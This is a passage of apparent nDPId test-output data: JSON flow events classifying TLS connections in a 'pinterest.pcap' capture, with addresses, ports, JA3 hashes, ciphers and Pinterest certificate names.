com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 